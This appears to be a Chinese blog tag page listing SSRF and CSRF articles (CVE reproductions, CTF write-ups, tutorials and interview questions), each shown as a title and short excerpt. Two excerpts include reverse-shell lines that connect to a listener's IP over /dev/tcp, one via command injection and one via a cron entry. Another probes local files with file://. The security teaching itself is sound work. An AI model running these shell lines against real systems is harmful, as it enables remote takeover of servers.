SSRF

CSRF 与 SSRF 的关联与区别

CSRF与SSRF的关联与区别区别特性CSRF(跨站请求伪造)SSRF(服务器端请求伪造)攻击方向客户端→目标网站服务器→内部/外部资源攻击目标利用用户身份执行非预期操作利用服务器访问内部资源或发起对外请求受害者已认证的用户存在漏洞的服务器利用条件用户必须已登录目标网站需要存在可控制的服务器端请求功能常见场景修改密码

心一·2025-06-24 17:59

Apache Kafka Connect接口存在任意文件读取漏洞与SSRF漏洞CVE-2025-27817

@[toc]免责声明：请勿利用文章内的相关技术从事非法测试，由于传播、利用此文所提供的信息或者工具而造成的任何直接或者间接的后果及损失，均由使用者本人负责，所产生的一切不良后果与文章作者无关。该文章仅供学习用途使用。1.ApacheKafka简介微信公众号搜索：南风漏洞复现文库该文章南风漏洞复现文库公众号首发ApacheKafka是一个分布式的流式数据平台，可以用于构建实时的数据管道和流式应用程序

sublime88·2025-06-23 21:46

CVE-2025-27817 POC

ApacheKafkaClients任意文件读取与SSRF漏洞漏洞成因该漏洞源于ApacheKafkaClient在配置SASL/OAUTHBEARER连接时，对sasl.oauthbearer.token.endpoint.url

章鱼哥喜欢吹笛子·2025-06-23 21:44

Java安全防线第一篇：SQL注入 - 你的数据库正在“裸奔“吗？

文件上传漏洞：黑客的"特洛伊木马"如何潜入XXE漏洞：XML解析如何成为系统后门反序列化漏洞：Java对象的"变身术"攻击SSRF漏洞：内网如何被"隔山打牛"RCE漏洞：系统命令执行的"死亡调用"JNDI

全息架构师·2025-06-23 02:38

WEB安全--CSRF&SSRF

一、CSRF1.1、原理跨站点请求伪造---攻击者诱导用户在已认证的web应用中执行非法操作，通过构造虚假的网页并在该网页中植入危险脚本，受害者在不知情的情况下进入该网页，网页就会盗用受害者浏览器中的session或cookie执行危险命令，可以你的名义发送邮件，发消息，盗用你的账号，甚至于购买商品，虚拟货币转账等。1.2、防御手段1、验证HTTPReferer字段（可绕过）2、请求地址中添加to

Neur0toxin·2025-06-20 22:32

ssrf漏洞利用+CTF实例

引发ssrf漏洞的几个函数file_get_contents()把整个文件读入一个字符串中，获取本地或者远程文件内容fsockopen()获得套接字信息curl_exec()执行一个curl会话，由curl_init

疯狂的小羊肖恩·2025-06-19 08:02

【漏洞挖掘】——33、SSRF攻防对抗(中)

重定向绕过检查场景介绍有时候通过利用开放重定向漏洞可以规避任何类型的基于过滤器的防御，在前面的SSRF示例中假设用户提交的URL经过严格验证以防止恶意利用SSRF行为，但是允许其URL的应用程序包含一个开放重定向漏洞

FLy_鹏程万里·2025-06-19 08:00

Apache Solr stream.url SSRF与任意文件读取漏洞(附pythonEXP脚本)

ApacheSolr的某些功能存在过滤不严格，在ApacheSolr未开启认证的情况下，攻击者可直接构造特定请求开启特定配置，并最终造成SSRF或文件读取漏洞。

MD@@nr丫卡uer·2025-06-18 18:27

ffmpeg ，结合 SSRF任意文件读取漏洞

ffmpeg，结合SSRF任意文件读取漏洞前言一、ffmpeg是什么？

德古拉的杂货铺·2025-06-18 18:57

SSRF6 利用ssrf漏洞结合RCE远程命令执行漏洞打组合拳

一.RCE远程命令执行漏洞的介绍可直接在目标服务器上执行任意命令---接管服务器该漏洞主要有命令执行函数引起：例如：system:()函数system("ping用户提供的参数")以下为以下执行符号：1.；指顺序执行2.&后台执行3.&&与条件执行4.|管道符执行5.||或条件执行例如我们以”;“举例：baidu.com;bash-i>&/dev/tcp/192.168.112.128/44440

浮江雾·2025-06-18 17:53

沙箱（Sandbox）

本文将深入探讨沙箱化的概念、工作原理、目的和优势，以及其在实际应用中的实现，特别是结合Docker容器和SSRF代理服务器的实践。一、什么是沙箱

fydw_715·2025-06-13 22:31

2025年渗透测试面试题总结-小鹏[实习]安全工程师（题目+回答）

ssrf是什么？6.ctf的时候负责什么方向的题7.为什么要搞信息安全，对安全这一块有多大的兴趣，

独行soc·2025-06-11 14:26

shiro、struts2、weblogic特征流量分析

**SSRF漏洞（CVE-2014-4210）**3.**T3协议

桑晒.·2025-06-08 23:00

零基础在实践中学习网络安全-皮卡丘靶场（第十六期-SSRF模块）

最后一期了，感谢大家一直以来的关注，如果您对本系列文章内容有问题或者有更好的方法，请在评论区发送。介绍其形成的原因大都是由于服务端提供了从其他服务器应用获取数据的功能,但又没有对目标地址做严格过滤与限制导致攻击者可以传入任意的地址来让后端服务器对其发起请求,并返回对该目标地址请求的数据数据流:攻击者----->服务器---->目标地址根据后台使用的函数的不同,对

恰薯条的屑海鸥·2025-06-08 09:52

dify1.3.1应用服务与数据服务分离，附件及插件包迁移至minio，实现离线部署，保证插件正常运行

dify服务端包含api、worker、web、sandbox、plugin_daemon、ssrf_proxy、nginx七个服务，其中api与worker使用同一镜像。

Time_1023·2025-06-01 14:31

第39天：WEB攻防-通用漏洞&CSRF&SSRF&协议玩法&内网探针&漏洞利用

目录CSRF：跨站请求伪造定义：举例条件CSRF的防护SSRF服务器端请求伪造举例漏洞利用攻击：端口扫描，指纹识别，漏洞利用，内网探针（端口字典爆破）--通过远程请求的方式，访问内网其他服务器。

My Year 2019·2025-05-25 00:15

【网络安全 | CTF】攻防世界 very_easy_sql 解题详析（gopher协议+ssrf漏洞sql注入+盲注脚本）

姿势登录处直接注入会提示youarenotaninneruser,sowecannotletyouhaveidentify~查看源代码发现use.php，访问后猜测该题为基于ssrf漏洞的sql注入：先在登录处抓包判断注入参数

秋说·2025-05-09 00:51

2025年渗透测试面试题总结-渗透岗位全职工作面试（附回答）（题目+回答）

目录一、通用基础类问题1.自我介绍2.职业动机与规划3.加班/出差接受度二、安全技术类问题1.漏洞原理（如SSRF、XXE、反序列化）2.代理原理（正向/反向代理）3.安全防护措施（如CSRF防御）三、

独行soc·2025-05-08 00:17

什么是SSRF

文章目录1.SSRF漏洞1.1业务场景1.2代码demo1.3漏洞原理2.URISchema2.1示例对比2.2SSRF中常用URIschema3.漏洞利用（内网探测流程）3.1file://（探测内网存活主机

藤原千花的败北·2025-05-05 04:41

【[De1CTF 2019]SSRF Me1】

目录代码审计整体代码逐块审计'/De1ta'路由waf函数exec()scan函数self.checkSign()getSign()解题过程代码审计整体代码#!/usr/bin/envpython#encoding=utf-8fromflaskimportFlaskfromflaskimportrequestimportsocketimporthashlibimporturllibimportsy

白初&·2025-05-03 21:19

从0到1——CTFer成长之路（三）

从0到1——CTFer成长之路（三）SSRF漏洞SSRFTraining命令执行漏洞死亡ping命令XSS的魔力XSS闯关web文件上传漏洞文件上传第二章web进阶SSRF漏洞SSRFTraining命令执行漏洞死亡

youngerll·2025-05-03 19:05

2025年渗透测试面试题总结-拷打题库10（题目+回答）

拷打题库101.CSRF成因及防御措施|非Token防御2.XSSWorm原理3.Cookie的P3P性质4.CSRF危害5.SQL注入类型6.参数化查询防注入原理7.Redis未授权访问漏洞利用8.SSRF

独行soc·2025-04-29 21:39

SSRF漏洞学习

一、SSRF漏洞1.xml回顾2.SSRF的定义1）例题#curl函数使用示例代码示例:ch=curlinit();curlsetopt(ch=curl_init();curl_setopt(ch=curlinit

jonhswei·2025-04-27 00:57

SSRF漏洞技术解析与实战防御指南

一、SSRF漏洞简介服务端请求伪造（Server-SideRequestForgery,SSRF）是一种攻击者通过操控服务端发起非预期网络请求的安全漏洞。

Alfadi联盟萧瑶·2025-04-11 11:31

利用解析差异SSRF + sqlite注入 + waf逻辑漏洞 -- xyctf 2025 fate WP

本文章附带TP(ThinkingProcess)!#!/usr/bin/envpython3#导入所需的库importflask#Flaskweb框架importsqlite3#SQLite数据库操作importrequests#HTTP请求库importstring#字符串处理importjson#JSON处理app=flask.Flask(__name__)#创建Flask应用实例blackl

A5rZ·2025-04-09 18:59

2025年渗透测试面试题总结- 某汽车厂商-安全工程师扩展（题目+回答）

目录某汽车厂商-安全工程师扩展一、XXE漏洞与SSRF的深度对比1.XXE（XMLExternalEntity）漏洞2.SSRF（Server-SideRequestForgery）二、代码审计流程的六阶段模型

独行soc·2025-04-08 08:54

2025年渗透测试面试题总结-某四字大厂面试复盘扩展二面（题目+回答）

目录某四字大厂面试复盘二面一、文件上传绕过WAF的15种深度技巧二、SSRF利用与WAF绕过的8种高阶手法三、MSSQL无XP_CMDSHELL的6种拿Shell方法四、无回显RCE的5种数据外带技术五

独行soc·2025-04-07 14:29

CSRF vs SSRF详解

一、CSRF（跨站请求伪造）攻击全解攻击原理示意图受害者浏览器├──已登录银行网站（Cookie存活）└──访问恶意网站执行：核心技术要点信任滥用机制：利用浏览器自动携带Cookie的特性，伪造已认证用户的HTTP请求（GET/POST均可）经典攻击链：诱导点击→携带身份Cookie→执行敏感操作绕过同源策略的技巧：document.forms[0].submit();高级攻击变种：JSONCSR

豪门土狗·2025-04-04 05:38

2025年渗透测试面试题总结-某携程旅游-基础安全工程师（题目+回答）

目录携程旅游-基础安全工程师反序列化原理核心原理扩展分析SQL注入本质核心原理扩展分析SQL注入写马流程核心步骤扩展分析Outfile与Dumpfile的区别宽字节截断原理核心逻辑扩展分析SSRF的利用和防御利用方式防御方案

独行soc·2025-04-03 18:00

SSRF 攻击与防御：从原理到落地实践

1.什么是SSRF？SSRF（Server-SideRequestForgery）是一种常见的Web安全漏洞。

花千树-010·2025-03-21 20:26

安全面试2

文章目录简单描述一下什么是水平越权，什么是垂直越权，我要发现这两类漏洞，那我代码审计要注意什么地方水平越权：垂直越权：水平越权漏洞的审计重点垂直越权漏洞的审计重点解释一下ssrf漏洞原理攻击场景修复方法横向移动提权

白初&·2025-02-23 18:00

2024年hw蓝队初级面试总结_weblogic反序列化流量特征(1)

的时候，忘记加/将造成目录穿越漏洞）CRLF注入(Nginx会将$uri进行解码，导致传入%0a%0d即可引入换行符，造成CRLF注入漏洞)jboss:反序列化war后门部署weblogic：反序列化ssrf

2401_84254530·2025-02-09 05:49

追洞计划 | Gitlab CI Lint API未授权 SSRF漏洞(CVE-2021-22214)

文章来源｜MS08067Web安全知识星球本文作者：Taoing（Web安全攻防合伙人）GitLab是一个用于仓库管理系统的开源项目，使用Git作为代码管理工具，并在此基础上搭建起来的Web服务。一、漏洞描述GitLab是美国GitLab公司的一款使用RubyonRails开发的、自托管的、Git（版本控制系统）项目仓库应用程序。该程序可用于查阅项目的文件内容、提交历史、Bug列表等。CVE-20

Ms08067安全实验室·2025-02-07 14:44

【SSRF漏洞】——http协议常见绕过

改变的确很难，但结果值得冒险本文如有错误之处，还请各位师傅指正一.ssrf概述SSRF全称为Server-sideRequestFogery,中文含义服务器端请求伪造SSRF是一种由攻击者构造形成由目标服务端发起请求的一个安全漏洞

403_found·2025-01-30 14:06

面试经验分享 | 北京渗透测试岗位

4、说一下CSRF和SSRF的区别？5、说一下文件上传的绕过方式？6、mysql数据

黑客老陈·2025-01-22 07:05

大量研究SSRF文章和报告的总结

前言研究大量有关服务器端请求伪造(SSRF)的文章和报告后，输出了一份有关SSRF漏洞的全面概述服务器端请求伪造（SSRF）服务器端请求伪

渗透小白鼠·2025-01-20 13:40

[NISACTF 2022]easyssrf

打开题目所在的环境，发现是快照获取的工具，这里我尝试输入的是百度的网址，发现他会返回这个网站的一些基本信息：这个题目提示了ssrf，我们这里用file协议开始测试：file:///etc/password

迭归·2025-01-20 01:39

ctfshow web入门 ssrf web351~web360

目录SSRF基础web351web352、353web354web355web356web357web358web359web360SSRF基础SSRF(Server-SideRequestForgery

kikkeve·2024-09-12 00:21

weblogic-SSRF漏洞复现（SSRF原理、利用与防御）

一、SSRF概念服务端请求伪造(Server-SideRequestForgery),是一种由攻击者构造形成由服务端发起请求的一个安全漏洞。一般情况下，SSRF攻击的目标是从外网无法访问的内部系统。

不想当脚本小子的脚本小子·2024-09-09 15:33

网络安全最新网络安全-SSRF漏洞原理、攻击与防御(1)，2024年最新网络安全程序员架构之路该如何继续学习

如何自学黑客&网络安全黑客零基础入门学习路线&规划初级黑客1、网络安全理论知识（2天）①了解行业相关背景，前景，确定发展方向。②学习网络安全相关法律法规。③网络安全运营的概念。④等保简介、等保规定、流程和规范。（非常重要）2、渗透测试基础（一周）①渗透测试的流程、分类、标准②信息收集技术：主动/被动信息搜集、Nmap工具、GoogleHacking③漏洞扫描、漏洞利用、原理，利用方法、工具（MSF

2401_84265972·2024-09-09 13:54

web渗透：SSRF漏洞

SSRF漏洞的原理SSRF（Server-SideRequestForgery，服务器端请求伪造）是一种安全漏洞，它允许攻击者构造请求，由服务端发起，从而访问服务端无法直接访问的内部或外部资源。

燕雀安知鸿鹄之志哉.·2024-09-05 23:35

ssrf做题随记--任务计划的写入、csrf简单知识

目录ssrfcsrfssrf这里忘记写文档了，然后再次搭建环境一直成功不了所以这里以文字的方式记录一些要注意的点。redis在低版本下没有降权然后执行的时候是以root权限执行，到了高版本以后就不行了redis被降权了,且如果是高版本稳定版的话是没有办法写入也就是更加安全*****/bin/bash-i>&/dev/tcp/192.168.0.106/77770>&1centos写入任务计划是很正

板栗妖怪·2024-08-29 07:30

SSRF漏洞笔记

SSRF漏洞简介SSRF：（Server-SideRequestForgery:服务器端请求伪造）是一种由攻击者构造特殊形成的请求，并且由指定服务器端发起恶意请求的一个安全漏洞。

Aqua丿·2024-08-25 09:17

【复现】Rebuild管理系统SSRF漏洞_44

目录一.概述二.漏洞影响三.漏洞复现1.漏洞一：四.修复建议：五.搜索语法：六.免责声明一.概述REBUILD（简称RB）是一款高度可配置化的企业管理系统，旨在帮助企业快速完成信息化建设，而无需高昂的研发成本投入。当遇到业务变化或需求变更时，可以通过系统本身提供的可配置化特性直接达成业务需求，而无需额外投入。通过REBUILD提供的各种配置化功能，您可以进行各种业务流程编排，灵活可靠。二.漏洞影响

穿着白衣·2024-02-12 21:39

Ivanti Pulse Connect Secure VPN SSRF(CVE-2023-46805)漏洞

免责声明：文章来源互联网收集整理，请勿利用文章内的相关技术从事非法测试，由于传播、利用此文所提供的信息或者工具而造成的任何直接或者间接的后果及损失，均由使用者本人负责，所产生的一切不良后果与文章作者无关。该文章仅供学习用途使用。Ⅰ、漏洞描述IvantiConnectSecure为远程和移动用户提供了一个无缝的、具有成本效益的SSLVPN解决方案，使他们能随时随地从任何可上网的设备访问企业资源。Iv

Love Seed·2024-02-10 14:47

Rebuild企业管理系统 SSRF漏洞复现(CVE-2024-1021)

0x01产品简介Rebuild是高度可配置化的企业管理系统！企业内部可免费使用！低代码/零代码快速搭建企业中台、CRM客户关系管理、WMS库存管理、TMS运输管理、SCM供应链管理，外贸管理，甚至是ERP企业资源计划！0x02漏洞概述Rebuild3.5.5版本存在安全漏洞，该漏洞源于组件HTTPRequestHandler的readRawText函数的url参数存在服务器端请求伪造漏洞。0x03

OidBoy_G·2024-02-08 05:33

SSRF-服务端请求伪造

SSRF-服务端请求伪造1.SSRF是什么？SSRF(Server-sideRequestForge,服务端请求伪造)。

weixin_50339082·2024-02-06 17:48

SSRF(服务端请求伪造)原理/防御

原理攻击者伪造服务器获取资源的请求,通过服务器来攻击内部系统比如端口扫描,读取默认文件判断服务架构,或者配合SQL注入等其他漏洞攻击内网的主机触发点/检测SSRF常出现在URL中,比如分享,翻译,图片加载

小蚁网络安全（胡歌）·2024-02-06 17:48

SSRF——服务端请求伪造

什么是SSRF？服务器端请求伪造（SSRF）是指攻击者能够从易受攻击的Web应用程序发送精心设计的请求的对其他网站进行攻击。

正在过坎·2024-02-06 17:47

服务端请求伪造 (SSRF)：利用漏洞实现攻击的风险和防范方法

1、SSRF漏洞简介01什么是SSRF02SSRF形成的原因03与CSRF的区别04SSRF攻击的危害2、漏洞场景01从WEB功能点寻找02从URL关键字寻找03总结2、SSRF漏洞利用01dict:/

狗蛋的博客之旅·2024-02-06 17:17

推荐频道